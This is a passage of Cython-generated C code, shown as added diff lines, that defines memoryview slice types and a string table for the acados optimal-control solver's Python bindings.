/*tp_iternext*/ + __pyx_methods_memoryview, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_memoryview, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_memoryview, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif +static struct __pyx_vtabstruct__memoryviewslice __pyx_vtable__memoryviewslice; + +static PyObject *__pyx_tp_new__memoryviewslice(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_memoryviewslice_obj *p; + PyObject *o = __pyx_tp_new_memoryview(t, a, k); + if (unlikely(!o)) return 0; + p = ((struct __pyx_memoryviewslice_obj *)o); + p->__pyx_base.__pyx_vtab = (struct __pyx_vtabstruct_memoryview*)__pyx_vtabptr__memoryviewslice; + p->from_object = Py_None; Py_INCREF(Py_None); + p->from_slice.memview = NULL; + return o; +} + +static void __pyx_tp_dealloc__memoryviewslice(PyObject *o) { + struct __pyx_memoryviewslice_obj *p = (struct __pyx_memoryviewslice_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc__memoryviewslice) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_memoryviewslice___dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + Py_CLEAR(p->from_object); + PyObject_GC_Track(o); + __pyx_tp_dealloc_memoryview(o); +} + +static int __pyx_tp_traverse__memoryviewslice(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_memoryviewslice_obj *p = (struct __pyx_memoryviewslice_obj *)o; + e = __pyx_tp_traverse_memoryview(o, v, a); if (e) return e; + if (p->from_object) { + e = (*v)(p->from_object, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear__memoryviewslice(PyObject *o) { + PyObject* tmp; + struct __pyx_memoryviewslice_obj *p = (struct __pyx_memoryviewslice_obj *)o; + __pyx_tp_clear_memoryview(o); + tmp = ((PyObject*)p->from_object); + p->from_object = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + __PYX_XCLEAR_MEMVIEW(&p->from_slice, 1); + return 0; +} + +static PyMethodDef __pyx_methods__memoryviewslice[] = { + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryviewslice_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryviewslice_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type___pyx_memoryviewslice_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc__memoryviewslice}, + {Py_tp_doc, (void *)PyDoc_STR("Internal class for passing memoryview slices to Python")}, + {Py_tp_traverse, (void *)__pyx_tp_traverse__memoryviewslice}, + {Py_tp_clear, (void *)__pyx_tp_clear__memoryviewslice}, + {Py_tp_methods, (void *)__pyx_methods__memoryviewslice}, + {Py_tp_new, (void *)__pyx_tp_new__memoryviewslice}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_memoryviewslice_spec = { + "acados_template.acados_ocp_solver_pyx._memoryviewslice", + sizeof(struct __pyx_memoryviewslice_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_SEQUENCE, + __pyx_type___pyx_memoryviewslice_slots, +}; +#else + +static PyTypeObject __pyx_type___pyx_memoryviewslice = { + PyVarObject_HEAD_INIT(0, 0) + "acados_template.acados_ocp_solver_pyx.""_memoryviewslice", /*tp_name*/ + sizeof(struct __pyx_memoryviewslice_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc__memoryviewslice, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + #if CYTHON_COMPILING_IN_PYPY || 0 + __pyx_memoryview___repr__, /*tp_repr*/ + #else + 0, /*tp_repr*/ + #endif + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + #if CYTHON_COMPILING_IN_PYPY || 0 + __pyx_memoryview___str__, /*tp_str*/ + #else + 0, /*tp_str*/ + #endif + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_SEQUENCE, /*tp_flags*/ + PyDoc_STR("Internal class for passing memoryview slices to Python"), /*tp_doc*/ + __pyx_tp_traverse__memoryviewslice, /*tp_traverse*/ + __pyx_tp_clear__memoryviewslice, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods__memoryviewslice, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new__memoryviewslice, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyMethodDef __pyx_methods[] = { + {0, 0, 0, 0} +}; +#ifndef CYTHON_SMALL_CODE +#if defined(__clang__) + #define CYTHON_SMALL_CODE +#elif defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) + #define CYTHON_SMALL_CODE __attribute__((cold)) +#else + #define CYTHON_SMALL_CODE +#endif +#endif +/* #### Code section: pystring_table ### */ + +static int __Pyx_CreateStringTabAndInitStrings(void) { + __Pyx_StringTabEntry __pyx_string_tab[] = { + {&__pyx_kp_u_, __pyx_k_, sizeof(__pyx_k_), 0, 1, 0, 0}, + {&__pyx_n_s_ASCII, __pyx_k_ASCII, sizeof(__pyx_k_ASCII), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython, __pyx_k_AcadosOcpSolverCython, sizeof(__pyx_k_AcadosOcpSolverCython), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython___get_poin, __pyx_k_AcadosOcpSolverCython___get_poin, sizeof(__pyx_k_AcadosOcpSolverCython___get_poin), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython___get_stat, __pyx_k_AcadosOcpSolverCython___get_stat, sizeof(__pyx_k_AcadosOcpSolverCython___get_stat), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython___get_stat_2, __pyx_k_AcadosOcpSolverCython___get_stat_2, sizeof(__pyx_k_AcadosOcpSolverCython___get_stat_2), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython___get_stat_3, __pyx_k_AcadosOcpSolverCython___get_stat_3, sizeof(__pyx_k_AcadosOcpSolverCython___get_stat_3), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython___reduce_c, __pyx_k_AcadosOcpSolverCython___reduce_c, sizeof(__pyx_k_AcadosOcpSolverCython___reduce_c), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython___setstate, __pyx_k_AcadosOcpSolverCython___setstate, sizeof(__pyx_k_AcadosOcpSolverCython___setstate), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython__get_poin, __pyx_k_AcadosOcpSolverCython__get_poin, sizeof(__pyx_k_AcadosOcpSolverCython__get_poin), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython__get_stat, __pyx_k_AcadosOcpSolverCython__get_stat, sizeof(__pyx_k_AcadosOcpSolverCython__get_stat), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython__get_stat_2, __pyx_k_AcadosOcpSolverCython__get_stat_2, sizeof(__pyx_k_AcadosOcpSolverCython__get_stat_2), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython__get_stat_3, __pyx_k_AcadosOcpSolverCython__get_stat_3, sizeof(__pyx_k_AcadosOcpSolverCython__get_stat_3), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_constraint, __pyx_k_AcadosOcpSolverCython_constraint, sizeof(__pyx_k_AcadosOcpSolverCython_constraint), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_constraint_2, __pyx_k_AcadosOcpSolverCython_constraint_2, sizeof(__pyx_k_AcadosOcpSolverCython_constraint_2), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_cost_set, __pyx_k_AcadosOcpSolverCython_cost_set, sizeof(__pyx_k_AcadosOcpSolverCython_cost_set), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_cost_set_m, __pyx_k_AcadosOcpSolverCython_cost_set_m, sizeof(__pyx_k_AcadosOcpSolverCython_cost_set_m), 0, 1, 0, 0}, + {&__pyx_kp_u_AcadosOcpSolverCython_does_not_s, __pyx_k_AcadosOcpSolverCython_does_not_s, sizeof(__pyx_k_AcadosOcpSolverCython_does_not_s), 0, 1, 0, 0}, + {&__pyx_kp_u_AcadosOcpSolverCython_does_not_s_2, __pyx_k_AcadosOcpSolverCython_does_not_s_2, sizeof(__pyx_k_AcadosOcpSolverCython_does_not_s_2), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_dynamics_g, __pyx_k_AcadosOcpSolverCython_dynamics_g, sizeof(__pyx_k_AcadosOcpSolverCython_dynamics_g), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_eval_param, __pyx_k_AcadosOcpSolverCython_eval_param, sizeof(__pyx_k_AcadosOcpSolverCython_eval_param), 0, 1, 0, 0}, + {&__pyx_kp_u_AcadosOcpSolverCython_eval_param_2, __pyx_k_AcadosOcpSolverCython_eval_param_2, sizeof(__pyx_k_AcadosOcpSolverCython_eval_param_2), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_eval_param_3, __pyx_k_AcadosOcpSolverCython_eval_param_3, sizeof(__pyx_k_AcadosOcpSolverCython_eval_param_3), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_get, __pyx_k_AcadosOcpSolverCython_get, sizeof(__pyx_k_AcadosOcpSolverCython_get), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_get_cost, __pyx_k_AcadosOcpSolverCython_get_cost, sizeof(__pyx_k_AcadosOcpSolverCython_get_cost), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_get_field, __pyx_k_AcadosOcpSolverCython_get_field, sizeof(__pyx_k_AcadosOcpSolverCython_get_field), 0, 1, 0, 0}, + {&__pyx_kp_u_AcadosOcpSolverCython_get_is_an, __pyx_k_AcadosOcpSolverCython_get_is_an, sizeof(__pyx_k_AcadosOcpSolverCython_get_is_an), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_get_residu, __pyx_k_AcadosOcpSolverCython_get_residu, sizeof(__pyx_k_AcadosOcpSolverCython_get_residu), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_get_stage, __pyx_k_AcadosOcpSolverCython_get_stage, sizeof(__pyx_k_AcadosOcpSolverCython_get_stage), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_get_stats, __pyx_k_AcadosOcpSolverCython_get_stats, sizeof(__pyx_k_AcadosOcpSolverCython_get_stats), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_load_itera, __pyx_k_AcadosOcpSolverCython_load_itera, sizeof(__pyx_k_AcadosOcpSolverCython_load_itera), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_options_se, __pyx_k_AcadosOcpSolverCython_options_se, sizeof(__pyx_k_AcadosOcpSolverCython_options_se), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_options_se_2, __pyx_k_AcadosOcpSolverCython_options_se_2, sizeof(__pyx_k_AcadosOcpSolverCython_options_se_2), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_print_stat, __pyx_k_AcadosOcpSolverCython_print_stat, sizeof(__pyx_k_AcadosOcpSolverCython_print_stat), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_reset, __pyx_k_AcadosOcpSolverCython_reset, sizeof(__pyx_k_AcadosOcpSolverCython_reset), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_set, __pyx_k_AcadosOcpSolverCython_set, sizeof(__pyx_k_AcadosOcpSolverCython_set), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_set_is_not, __pyx_k_AcadosOcpSolverCython_set_is_not, sizeof(__pyx_k_AcadosOcpSolverCython_set_is_not), 0, 1, 0, 0}, + {&__pyx_kp_u_AcadosOcpSolverCython_set_mismat, __pyx_k_AcadosOcpSolverCython_set_mismat, sizeof(__pyx_k_AcadosOcpSolverCython_set_mismat), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_set_new_ti, __pyx_k_AcadosOcpSolverCython_set_new_ti, sizeof(__pyx_k_AcadosOcpSolverCython_set_new_ti), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_solve, __pyx_k_AcadosOcpSolverCython_solve, sizeof(__pyx_k_AcadosOcpSolverCython_solve), 0, 0, 1, 1}, + {&__pyx_kp_u_AcadosOcpSolverCython_solve_argu, __pyx_k_AcadosOcpSolverCython_solve_argu, sizeof(__pyx_k_AcadosOcpSolverCython_solve_argu), 0, 1, 0, 0}, + {&__pyx_kp_u_AcadosOcpSolverCython_solve_argu_2, __pyx_k_AcadosOcpSolverCython_solve_argu_2, sizeof(__pyx_k_AcadosOcpSolverCython_solve_argu_2), 0, 1, 0, 0}, + {&__pyx_n_s_AcadosOcpSolverCython_store_iter, __pyx_k_AcadosOcpSolverCython_store_iter, sizeof(__pyx_k_AcadosOcpSolverCython_store_iter), 0, 0, 1, 1}, + {&__pyx_n_s_AcadosOcpSolverCython_update_qp, __pyx_k_AcadosOcpSolverCython_update_qp, sizeof(__pyx_k_AcadosOcpSolverCython_update_qp), 0, 0, 1, 1}, + {&__pyx_kp_s_All_dimensions_preceding_dimensi, __pyx_k_All_dimensions_preceding_dimensi, sizeof(__pyx_k_All_dimensions_preceding_dimensi), 0, 0, 1, 0}, + {&__pyx_n_s_AssertionError, __pyx_k_AssertionError, sizeof(__pyx_k_AssertionError), 0, 0, 1, 1}, + {&__pyx_kp_s_Buffer_view_does_not_expose_stri, __pyx_k_Buffer_view_does_not_expose_stri, sizeof(__pyx_k_Buffer_view_does_not_expose_stri), 0, 0, 1, 0}, + {&__pyx_kp_s_Can_only_create_a_buffer_that_is, __pyx_k_Can_only_create_a_buffer_that_is, sizeof(__pyx_k_Can_only_create_a_buffer_that_is), 0, 0, 1, 0}, + {&__pyx_kp_s_Cannot_assign_to_read_only_memor, __pyx_k_Cannot_assign_to_read_only_memor, sizeof(__pyx_k_Cannot_assign_to_read_only_memor), 0, 0, 1, 0}, + {&__pyx_kp_s_Cannot_create_writable_memory_vi, __pyx_k_Cannot_create_writable_memory_vi, sizeof(__pyx_k_Cannot_create_writable_memory_vi), 0, 0, 1, 0}, + {&__pyx_kp_u_Cannot_index_with_type, __pyx_k_Cannot_index_with_type, sizeof(__pyx_k_Cannot_index_with_type), 0, 1, 0, 0}, + {&__pyx_kp_s_Cannot_transpose_memoryview_with, __pyx_k_Cannot_transpose_memoryview_with, sizeof(__pyx_k_Cannot_transpose_memoryview_with), 0, 0, 1, 0}, + {&__pyx_kp_s_Dimension_d_is_not_direct, __pyx_k_Dimension_d_is_not_direct, sizeof(__pyx_k_Dimension_d_is_not_direct), 0, 0, 1, 0}, + {&__pyx_n_s_Ellipsis, __pyx_k_Ellipsis, sizeof(__pyx_k_Ellipsis), 0, 0, 1, 1}, + {&__pyx_kp_s_Empty_shape_tuple_for_cython_arr, __pyx_k_Empty_shape_tuple_for_cython_arr, sizeof(__pyx_k_Empty_shape_tuple_for_cython_arr), 0, 0, 1, 0}, + {&__pyx_n_u_F, __pyx_k_F, sizeof(__pyx_k_F), 0, 1, 0, 1}, + {&__pyx_n_s_ImportError, __pyx_k_ImportError, sizeof(__pyx_k_ImportError), 0, 0, 1, 1}, + {&__pyx_kp_s_Incompatible_checksums_0x_x_vs_0, __pyx_k_Incompatible_checksums_0x_x_vs_0, sizeof(__pyx_k_Incompatible_checksums_0x_x_vs_0), 0, 0, 1, 0}, + {&__pyx_n_s_IndexError, __pyx_k_IndexError, sizeof(__pyx_k_IndexError), 0, 0, 1, 1}, + {&__pyx_kp_s_Index_out_of_bounds_axis_d, __pyx_k_Index_out_of_bounds_axis_d, sizeof(__pyx_k_Index_out_of_bounds_axis_d), 0, 0, 1, 0}, + {&__pyx_kp_s_Indirect_dimensions_not_supporte, __pyx_k_Indirect_dimensions_not_supporte, sizeof(__pyx_k_Indirect_dimensions_not_supporte), 0, 0, 1, 0}, + {&__pyx_kp_u_Invalid_mode_expected_c_or_fortr, __pyx_k_Invalid_mode_expected_c_or_fortr, sizeof(__pyx_k_Invalid_mode_expected_c_or_fortr), 0, 1, 0, 0}, + {&__pyx_kp_u_Invalid_shape_in_axis, __pyx_k_Invalid_shape_in_axis, sizeof(__pyx_k_Invalid_shape_in_axis), 0, 1, 0, 0}, + {&__pyx_n_s_MemoryError, __pyx_k_MemoryError, sizeof(__pyx_k_MemoryError), 0, 0, 1, 1}, + {&__pyx_kp_s_MemoryView_of_r_at_0x_x, __pyx_k_MemoryView_of_r_at_0x_x, sizeof(__pyx_k_MemoryView_of_r_at_0x_x), 0, 0, 1, 0}, + {&__pyx_kp_s_MemoryView_of_r_object, __pyx_k_MemoryView_of_r_object, sizeof(__pyx_k_MemoryView_of_r_object), 0, 0, 1, 0}, + {&__pyx_n_s_N, __pyx_k_N, sizeof(__pyx_k_N), 0, 0, 1, 1}, + {&__pyx_kp_u_None, __pyx_k_None, sizeof(__pyx_k_None), 0, 1, 0, 0}, + {&__pyx_n_s_NotImplementedError, __pyx_k_NotImplementedError, sizeof(__pyx_k_NotImplementedError), 0, 0, 1, 1}, + {&__pyx_n_b_O, __pyx_k_O, sizeof(__pyx_k_O), 0, 0, 0, 1}, + {&__pyx_kp_u_Out_of_bounds_on_buffer_access_a, __pyx_k_Out_of_bounds_on_buffer_access_a, sizeof(__pyx_k_Out_of_bounds_on_buffer_access_a), 0, 1, 0, 0}, + {&__pyx_n_s_PickleError, __pyx_k_PickleError, sizeof(__pyx_k_PickleError), 0, 0, 1, 1}, + {&__pyx_n_u_SQP, __pyx_k_SQP, sizeof(__pyx_k_SQP), 0, 1, 0, 1}, + {&__pyx_n_u_SQP_RTI, __pyx_k_SQP_RTI, sizeof(__pyx_k_SQP_RTI), 0, 1, 0, 1}, + {&__pyx_n_s_Sequence, __pyx_k_Sequence, sizeof(__pyx_k_Sequence), 0, 0, 1, 1}, + {&__pyx_kp_s_Step_may_not_be_zero_axis_d, __pyx_k_Step_may_not_be_zero_axis_d, sizeof(__pyx_k_Step_may_not_be_zero_axis_d), 0, 0, 1, 0}, + {&__pyx_kp_u_TODO, __pyx_k_TODO, sizeof(__pyx_k_TODO), 0, 1, 0, 0}, + {&__pyx_n_s_TypeError, __pyx_k_TypeError, sizeof(__pyx_k_TypeError), 0, 0, 1, 1}, + {&__pyx_kp_s_Unable_to_convert_item_to_object, __pyx_k_Unable_to_convert_item_to_object, sizeof(__pyx_k_Unable_to_convert_item_to_object), 0, 0, 1, 0}, + {&__pyx_n_s_ValueError, __pyx_k_ValueError, sizeof(__pyx_k_ValueError), 0, 0, 1, 1}, + {&__pyx_n_s_View_MemoryView, __pyx_k_View_MemoryView, sizeof(__pyx_k_View_MemoryView), 0, 0, 1, 1}, + {&__pyx_kp_u_Y_m_d_H_M_S_f, __pyx_k_Y_m_d_H_M_S_f, sizeof(__pyx_k_Y_m_d_H_M_S_f), 0, 1, 0, 0}, + {&__pyx_kp_u__14, __pyx_k__14, sizeof(__pyx_k__14), 0, 1, 0, 0}, + {&__pyx_n_u__15, __pyx_k__15, sizeof(__pyx_k__15), 0, 1, 0, 1}, + {&__pyx_kp_u__2, __pyx_k__2, sizeof(__pyx_k__2), 0, 1, 0, 0}, + {&__pyx_kp_u__29, __pyx_k__29, sizeof(__pyx_k__29), 0, 1, 0, 0}, + {&__pyx_n_s__3, __pyx_k__3, sizeof(__pyx_k__3), 0, 0, 1, 1}, + {&__pyx_kp_u__6, __pyx_k__6, sizeof(__pyx_k__6), 0, 1, 0, 0}, + {&__pyx_kp_u__7, __pyx_k__7, sizeof(__pyx_k__7), 0, 1, 0, 0}, + {&__pyx_n_s__84, __pyx_k__84, sizeof(__pyx_k__84), 0, 0, 1, 1}, + {&__pyx_n_s_abc, __pyx_k_abc, sizeof(__pyx_k_abc), 0, 0, 1, 1}, + {&__pyx_n_s_acados_template_acados_ocp_solve, __pyx_k_acados_template_acados_ocp_solve, sizeof(__pyx_k_acados_template_acados_ocp_solve), 0, 0, 1, 1}, + {&__pyx_n_s_allocate_buffer, __pyx_k_allocate_buffer, sizeof(__pyx_k_allocate_buffer), 0, 0, 1, 1}, + {&__pyx_n_u_alpha, __pyx_k_alpha, sizeof(__pyx_k_alpha), 0, 1, 0, 1}, + {&__pyx_n_u_alpha_min, __pyx_k_alpha_min, sizeof(__pyx_k_alpha_min), 0, 1, 0, 1}, + {&__pyx_n_u_alpha_reduction, __pyx_k_alpha_reduction, sizeof(__pyx_k_alpha_reduction), 0, 1, 0, 1}, + {&__pyx_kp_u_alpha_values_are_not_available_f, __pyx_k_alpha_values_are_not_available_f, sizeof(__pyx_k_alpha_values_are_not_available_f), 0, 1, 0, 0}, + {&__pyx_kp_u_and, __pyx_k_and, sizeof(__pyx_k_and), 0, 1, 0, 0}, + {&__pyx_n_s_array, __pyx_k_array, sizeof(__pyx_k_array), 0, 0, 1, 1}, + {&__pyx_n_s_ascontiguousarray, __pyx_k_ascontiguousarray, sizeof(__pyx_k_ascontiguousarray), 0, 0, 1, 1}, + {&__pyx_n_s_asfortranarray, __pyx_k_asfortranarray, sizeof(__pyx_k_asfortranarray), 0, 0, 1, 1}, + {&__pyx_n_s_asyncio_coroutines, __pyx_k_asyncio_coroutines, sizeof(__pyx_k_asyncio_coroutines), 0, 0, 1, 1}, + {&__pyx_kp_u_at_stage, __pyx_k_at_stage, sizeof(__pyx_k_at_stage), 0, 1, 0, 0}, + {&__pyx_n_s_base, __pyx_k_base, sizeof(__pyx_k_base), 0, 0, 1, 1}, + {&__pyx_n_s_c, __pyx_k_c, sizeof(__pyx_k_c), 0, 0, 1, 1}, + {&__pyx_n_u_c, __pyx_k_c, sizeof(__pyx_k_c), 0, 1, 0, 1}, + {&__pyx_n_s_class, __pyx_k_class, sizeof(__pyx_k_class), 0, 0, 1, 1}, + {&__pyx_n_s_class_getitem, __pyx_k_class_getitem, sizeof(__pyx_k_class_getitem), 0, 0, 1, 1}, + {&__pyx_n_s_cline_in_traceback, __pyx_k_cline_in_traceback, sizeof(__pyx_k_cline_in_traceback), 0, 0, 1, 1}, + {&__pyx_n_s_collections, __pyx_k_collections, sizeof(__pyx_k_collections), 0, 0, 1, 1}, + {&__pyx_kp_s_collections_abc, __pyx_k_collections_abc, sizeof(__pyx_k_collections_abc), 0, 0, 1, 0}, + {&__pyx_n_s_constraints_fields, __pyx_k_constraints_fields, sizeof(__pyx_k_constraints_fields), 0, 0, 1, 1}, + {&__pyx_n_s_constraints_set, __pyx_k_constraints_set, sizeof(__pyx_k_constraints_set), 0, 0, 1, 1}, + {&__pyx_kp_s_contiguous_and_direct, __pyx_k_contiguous_and_direct, sizeof(__pyx_k_contiguous_and_direct), 0, 0, 1, 0}, + {&__pyx_kp_s_contiguous_and_indirect, __pyx_k_contiguous_and_indirect, sizeof(__pyx_k_contiguous_and_indirect), 0, 0, 1, 0}, + {&__pyx_n_s_cost_fields, __pyx_k_cost_fields, sizeof(__pyx_k_cost_fields), 0, 0, 1, 1}, + {&__pyx_n_s_cost_set, __pyx_k_cost_set, sizeof(__pyx_k_cost_set), 0, 0, 1, 1}, + {&__pyx_n_s_count, __pyx_k_count, sizeof(__pyx_k_count), 0, 0, 1, 1}, + {&__pyx_n_s_datetime, __pyx_k_datetime, sizeof(__pyx_k_datetime), 0, 0, 1, 1}, + {&__pyx_n_s_default, __pyx_k_default, sizeof(__pyx_k_default), 0, 0, 1, 1}, + {&__pyx_n_s_dict, __pyx_k_dict, sizeof(__pyx_k_dict), 0, 0, 1, 1}, + {&__pyx_n_s_dims, __pyx_k_dims, sizeof(__pyx_k_dims), 0, 0, 1, 1}, + {&__pyx_kp_u_disable, __pyx_k_disable, sizeof(__pyx_k_disable), 0, 1, 0, 0}, + {&__pyx_n_s_double_fields, __pyx_k_double_fields, sizeof(__pyx_k_double_fields), 0, 0, 1, 1}, + {&__pyx_n_s_double_value, __pyx_k_double_value, sizeof(__pyx_k_double_value), 0, 0, 1, 1}, + {&__pyx_n_s_dtype, __pyx_k_dtype, sizeof(__pyx_k_dtype), 0, 0, 1, 1}, + {&__pyx_n_s_dtype_is_object, __pyx_k_dtype_is_object, sizeof(__pyx_k_dtype_is_object), 0, 0, 1, 1}, + {&__pyx_n_s_dump, __pyx_k_dump, sizeof(__pyx_k_dump), 0, 0, 1, 1}, + {&__pyx_n_s_dynamics_get, __pyx_k_dynamics_get, sizeof(__pyx_k_dynamics_get), 0, 0, 1, 1}, + {&__pyx_kp_u_enable, __pyx_k_enable, sizeof(__pyx_k_enable), 0, 1, 0, 0}, + {&__pyx_n_s_encode, __pyx_k_encode, sizeof(__pyx_k_encode), 0, 0, 1, 1}, + {&__pyx_n_s_enter, __pyx_k_enter, sizeof(__pyx_k_enter), 0, 0, 1, 1}, + {&__pyx_n_s_enumerate, __pyx_k_enumerate, sizeof(__pyx_k_enumerate), 0, 0, 1, 1}, + {&__pyx_n_u_eps_sufficient_descent, __pyx_k_eps_sufficient_descent, sizeof(__pyx_k_eps_sufficient_descent), 0, 1, 0, 1}, + {&__pyx_n_s_error, __pyx_k_error, sizeof(__pyx_k_error), 0, 0, 1, 1}, + 